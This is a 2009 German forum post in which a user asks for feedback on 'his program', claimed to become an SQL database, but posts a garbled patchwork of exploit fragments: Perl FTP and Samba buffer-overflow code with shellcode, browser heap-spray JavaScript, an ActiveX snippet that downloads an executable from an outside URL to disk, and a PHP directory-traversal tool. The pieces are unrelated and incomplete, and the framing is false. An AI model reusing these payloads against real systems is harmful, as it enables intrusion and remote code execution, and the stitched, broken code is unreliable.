Boardunity & Video Forum

Boardunity & Video Forum (https://boardunity.de/)
-   Programmierung und Datenbanken (https://boardunity.de/programmierung-datenbanken-f23.html)
-   -   Bitte eine Beurteilung (https://boardunity.de/bitte-beurteilung-t7094.html)

timy75 04.09.2009 13:41

Bitte eine Beurteilung
 
Wollte euch nun mal fragen, wie weit ihr meinen Programm hier beurteilen würdet.
Brauche bitte Feedbacks.

Danke


p.s

Sollte eine SQL Datenbank werden.

# EAX 010922E0
# ECX 0275FC14
# EDX 88776655
# EBX 00000028
# ESP 0275F688
# EBP 0275F81C
# ESI 00F90000
# EDI 00F90378
# EIP 77FC9906 ntdll.77FC9906
$ diff src/ctrigger.cpp src/ctrigger.cpp.new
9a10
> #include <stdio.h>
19a21,33
> void strip( char * str, char c )
> {
> char * p1 = str;
> while ( *p1++ )
> if( *p1 == c )
> {
> char * p2 = p1;
> while( *p2 && *p2 == c ) { ++p2; }
> if(*p2) { *p1 = *p2; *p2 = c; }
> else { *p1 = '\0'; break; }
> }
> }

# Instructions look like:
#
# 77FC98F4 8B48 08 MOV ECX,DWORD PTR DS:[EAX+8]
# 77FC98F7 898D 38FFFFFF MOV DWORD PTR SS:[EBP-C8],ECX
# 77FC98FD 8B50 0C MOV EDX,DWORD PTR DS:[EAX+C]
# 77FC9900 8995 34FFFFFF MOV DWORD PTR SS:[EBP-CC],EDX
# 77FC9906 890A MOV DWORD PTR DS:[EDX],ECX
# 77FC9908 8951 04 MOV DWORD PTR DS:[ECX+4],EDX
$host = $ARGV[0];
$username = $ARGV[1];
$password = $ARGV[2];
$port = 21;
$list = "\x4c\x49\x53\x54\x20\x2a";
$padding = "\x41" x 272;
$sock = new IO::Socket::INET
(
PeerAddr=> "$host",
PeerPort=> "$port",
Proto => 'tcp'
);
die "Connection failed: $!\n\n" unless $sock;
$user_string = "user $username\r\n";
$pass_string = "pass $password\r\n";
$port_string = "PORT 10,0,0,1,154,119\r\n"; # Source host doesn't matter
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\ x81\x73\x13\x10".
"\x92\xe9\xd3\x83\xeb\xfc\xe2\xf4\xec\xf8\x02\x9e\ xf8\x6b\x16\x2c".
"\xef\xf2\x62\xbf\x34\xb6\x62\x96\x2c\x19\x95\xd6\ x68\x93\x06\x58".
"\x5f\x8a\x62\x8c\x30\x93\x02\x9a\x9b\xa6\x62\xd2\ xfe\xa3\x29\x4a".
"\xbc\x16\x29\xa7\x17\x53\x23\xde\x11\x50\x02\x27\ x2b\xc6\xcd\xfb".
if ($ARGV[3] == '1')
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}
elsif ($ARGV[3] == '2')
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}
else
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}
print "\n[=] Connected.\n";
sleep 1;
print "[=] Sending $user_string";
$sock->send($user_string);
sleep 1;
id=hsmx classid="clsid:{E3462D53-47A6-11D8-8EF6-DAE89272743C
if (strlen($ora_osb_bgcookie) > 0 && $button == "Logout")
{
// Turn DEBUG_EXEC to off
$tmp = $DEBUG_EXEC;
$DEBUG_EXEC = "no";
if (strncmp($msg[0], "Error:", 6))
{
// Set the cookie up.
setcookie("ora_osb_bgcookie", "");
setcookie("ora_osb_lcookie", "");
$ora_osb_bgcookie = "";
}
$hostname = $_POST['hostname'];
$file = $_POST['file'];
$port = $_POST['port'];

if (isset($_POST['check_ver']))
{
echo '<pre>'.check_ver($hostname, 'ver', $port);
if (isset($_POST['parampampam']))
{
echo '<textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>'.check_ver($hostname, 'help /../'.$file."\0", $port).'</textarea>';
html();

}
}
try{
var obj = document.getElementById('kupa');
var rem = "http://www.adalex.pl/motyl/motyl-radio.exe";
var loc = "C:\evil.exe";
obj.Save("C:\owerwrite.ini");
obj.HttpDownloadFile(rem,loc);
}
alias unbanallx {
mode %chan +b
if ($ibl(%chan,0)) {
if (%chan ischan) {
if ($me isop %chan) || ($me ishop %chan) {
;mode %chan +b
var %x $ibl(%chan,0)
var %y 0
while (%y <= %x) {
var %banlist = $(%banlist,$ibl(%chan,%y))
inc %y
}
mode %chan $+(-,$str(b,$ibl(%chan,0))) %banlist
}
else { echo -a ur not op in %chan }
}
else { echo -a ur not on %chan }
}
}
define VERSN 25
struct versions vers[VERSN] =
{
{"Debian 3.1 r0 X restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r0 X",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r0 noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r0 noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r0a X 1st",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r0a noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r0a noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r1 noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r1 noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r2 noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r2 noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r3 noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r3 noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r4 noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r4 noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r5 noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r5 noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r6a noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r6a noX",0x0827c000,0x0837f000,30*1024},
{"Slackware 10.0 restart",0x0827c000,0x0837f000,30*1024},
{"Slackware 10.0",0x0827c000,0x0837f000,30*1024},
{"Mandrake 10.1 noX",0x80380000,0x8045b000,30*1024},
{"Mandrake 10.1 X Kde",0x80380000,0x8045b000,30*1024},
{"Samba 3.0.x DEBUG",0x80380000,0x8045b000,30*1024}
};
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41% 30%42%36") & _
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44% 42%48%34") & _
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30% 41%44%41") & _
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4c% 56%4b%4e") & _
unescape("%4d%54%4a%4e%49%4f%4f%4f%4f%4f%4f%4f%42% 56%4b%48") & _
unescape("%4e%56%46%32%46%32%4b%38%45%44%4e%53%4b% 58%4e%37") & _
unescape("%45%30%4a%57%41%30%4f%4e%4b%48%4f%34%4a% 51%4b%58") & _
unescape("%4f%35%42%52%41%50%4b%4e%49%54%4b%48%46% 53%4b%48") & _
unescape("%41%50%50%4e%41%33%42%4c%49%59%4e%4a%46% 38%42%4c") & _
unescape("%46%37%47%50%41%4c%4c%4c%4d%30%41%30%44% 4c%4b%4e") & _
unescape("%46%4f%4b%53%46%55%46%42%4a%52%45%57%45% 4e%4b%58") & _
unescape("%4f%35%46%32%41%30%4b%4e%48%56%4b%58%4e% 30%4b%44") & _
unescape("%4b%58%4f%55%4e%51%41%50%4b%4e%43%50%4e% 32%4b%48") & _
unescape("%49%38%4e%56%46%42%4e%31%41%46%43%4c%41% 53%4b%4d") & _
unescape("%46%36%4b%58%43%54%42%43%4b%48%42%44%4e% 50%4b%58") & _
unescape("%42%47%4e%51%4d%4a%4b%38%42%54%4a%30%50% 35%4a%56") & _
unescape("%50%48%50%54%50%30%4e%4e%42%55%4f%4f%48% 4d%48%46") & _
unescape("%43%35%48%56%4a%36%43%33%44%53%4a%46%47% 47%43%37") & _
unescape("%44%43%4f%45%46%55%4f%4f%42%4d%4a%46%4b% 4c%4d%4e") & _
unescape("%4e%4f%4b%43%42%55%4f%4f%48%4d%4f%35%49% 48%45%4e") & _
unescape("%48%56%41%38%4d%4e%4a%30%44%50%45%45%4c% 36%44%50") & _
unescape("%4f%4f%42%4d%4a%46%49%4d%49%50%45%4f%4d% 4a%47%55") & _
unescape("%4f%4f%48%4d%43%55%43%35%43%35%43%55%43% 45%43%54") & _
unescape("%43%55%43%54%43%45%4f%4f%42%4d%48%56%4a% 56%41%41") & _
unescape("%4e%45%48%46%43%55%49%48%41%4e%45%39%4a% 36%46%4a") & _
unescape("%4c%31%42%37%47%4c%47%55%4f%4f%48%4d%4c% 46%42%41") & _
unescape("%41%55%45%35%4f%4f%42%4d%4a%46%46%4a%4d% 4a%50%32") & _
unescape("%49%4e%47%35%4f%4f%48%4d%43%55%45%55%4f% 4f%42%4d") & _
unescape("%4a%36%45%4e%49%34%48%48%49%54%47%45%4f% 4f%48%4d") & _
unescape("%42%35%46%35%46%55%45%45%4f%4f%42%4d%43% 39%4a%46") & _
unescape("%47%4e%49%37%48%4c%49%57%47%35%4f%4f%48% 4d%45%45") & _
unescape("%4f%4f%42%4d%48%56%4c%36%46%56%48%56%4a% 46%43%46") & _
unescape("%4d%56%49%38%45%4e%4c%56%42%45%49%35%49% 42%4e%4c") & _
unescape("%49%38%47%4e%4c%46%46%54%49%38%44%4e%41% 33%42%4c") & _
unescape("%43%4f%4c%4a%50%4f%44%54%4d%32%50%4f%44% 44%4e%32") & _
unescape("%43%49%4d%58%4c%57%4a%53%4b%4a%4b%4a%4b% 4a%4a%46") & _
unescape("%44%57%50%4f%43%4b%48%41%4f%4f%45%57%46% 44%4f%4f") & _
unescape("%48%4d%4b%55%47%55%44%55%41%45%41%45%41% 45%4c%56") & _
unescape("%41%30%41%45%41%35%45%45%41%45%4f%4f%42% 4d%4a%46") & _
unescape("%4d%4a%49%4d%45%30%50%4c%43%45%4f%4f%48% 4d%4c%36") & _
unescape("%4f%4f%4f%4f%47%43%4f%4f%42%4d%4b%38%47% 35%4e%4f") & _
unescape("%43%38%46%4c%46%46%4f%4f%48%4d%44%55%4f% 4f%42%4d") & _
unescape("%4a%46%42%4f%4c%58%46%30%4f%45%43%35%4f% 4f%48%4d") & _
unescape("%4f%4f%42%4d%5a")
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\ x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\ x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\ x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\ x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\ x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\ x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\ x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\ x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\ x46\x58\x42\x4c".
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\ x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\ x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\ x4e\x50\x4b\x44".
my $overflow = "\x42" x 158;
my $overflow2 = "\x42" x 4;
my $overflow3 = "\x43" x 430;
my $overflow4len = 977 - ((length($shellhunter) - 7)); #very important calculation
my $overflow4 = "\x44" x $overflow4len
my $sled = "\x42" x 12;
my $sled2 = "\x41" x 24;
my $eip2 = "\x37\x55\x03\x10"; #10035537 call ecx, this won't be used
my $eip1 = "\x30\x4f\x01\x10"; #10014F30 call esi, this will be used.
my $heapaddr = "\x50\x0e\x08\x10"; #valid char for buffer, heap address
my $lookout = "\x37\x65\x41\x45" x 40; # 45446537 look out values <-
my $lookout2 = "\x37\x65\x41\x45\x41" x 4; # 45446537 <-
my $lookout3 = "\x37\x65\x41\x45\x41\x41" x 4; # 45446537 <-
my $lookout4 = "\x37\x65\x41\x45\x41\x41\x41" x 4; # 45446537 <-
my $additionaddr = "\x35\x65\x41\x45"; #used for an addition in the shellhunter (+2)
my $nopsled = "\x90\x90\x90\x90\x90\x90";
my $jmp = "\x75\x0c";
"%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff% u13cf%u01ac" + ' . "\n" .
' "%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb% u0c8b%u8b4b" + ' . "\n" .
' "%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031% u8b64%u3040" + ' . "\n" .
var sSlide = unescape("%u9090%u9090");
var heapSA = 0x0c0c0c0c;
function tryMe()
{
var buffSize = 8000;
var x = unescape("%0c%0c%0c%0c");
while (x.length<buffSize) x += x;
x = x.substring(0,buffSize);
boom.SetID(x);
}
}
var heapBS = 0x400000;
var sizeHDM = 0x5;
var PLSize = (sCode.length * 2);
var sSlideSize = heapBS - (PLSize + sizeHDM);
var heapBlocks = (heapSA+heapBS)/heapBS;
var memory = new Array();
sSlide = getsSlide(sSlide,sSlideSize);
for (i=0;i<heapBlocks;i++)
{
do {
spray += spray;
} while(spray.length < 0xd0000);
memory = new Array();
for(i = 0; i < 100; i++)
memory[i] = spray + shellcode;
"\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\ x81\x76\x0e\xaf".
"\x4f\xb9\xec\x83\xee\xfc\xe2\xf4\x53\xa7\xfd\xec\ xaf\x4f\x32\xa9".
"\x93\xc4\xc5\xe9\xd7\x4e\x56\x67\xe0\x57\x32\xb3\ x8f\x4e\x52\xa5".
"\x24\x7b\x32\xed\x41\x7e\x79\x75\x03\xcb\x79\x98\ xa8\x8e\x73\xe1".
"\xae\x8d\x52\x18\x94\x1b\x9d\xe8\xda\xaa\x32\xb3\ x8b\x4e\x52\x8a".
my $p1="\x00\x01";
my $p2="\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00";

my $ret = "\x5d\x10\x40"; #0040105D -> :) SkD's Tricks
my $nopsled = "\x90" x 10;
my $len = (274 - length($shellcode));

if($len < 0) {
print "[x] Your shellcode is too big! Find another way :)\n";
exit(0);
}
"%u652E%u6578%u9000");
var sSlide = unescape("%u9090%u9090");
var heapSA = 0x0c0c0c0c;
function tryMe()
{
var buffSize = 3000;
var x = unescape("%0c%0c%0c%0c");
while (x.length<buffSize) x += x;
x = x.substring(0,buffSize);
boom.CreateStore(x, 1);
}
}
var heapBS = 0x400000;
var sizeHDM = 0x5;
var PLSize = (sCode.length * 2);
var sSlideSize = heapBS - (PLSize + sizeHDM);
var heapBlocks = (heapSA+heapBS)/heapBS;
var memory = new Array();
sSlide = getsSlide(sSlide,sSlideSize);
for (i=0;i<heapBlocks;i++)
{
memory[i] = sSlide + sCode;
}
# grep allow_exec /etc/verlihub/dbconfig
allow_exec = 1
or
# grep allow_exec $HOME/.verlihub/dbconfig
allow_exec = 1


Alle Zeitangaben in WEZ +1. Es ist jetzt 14:03 Uhr.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25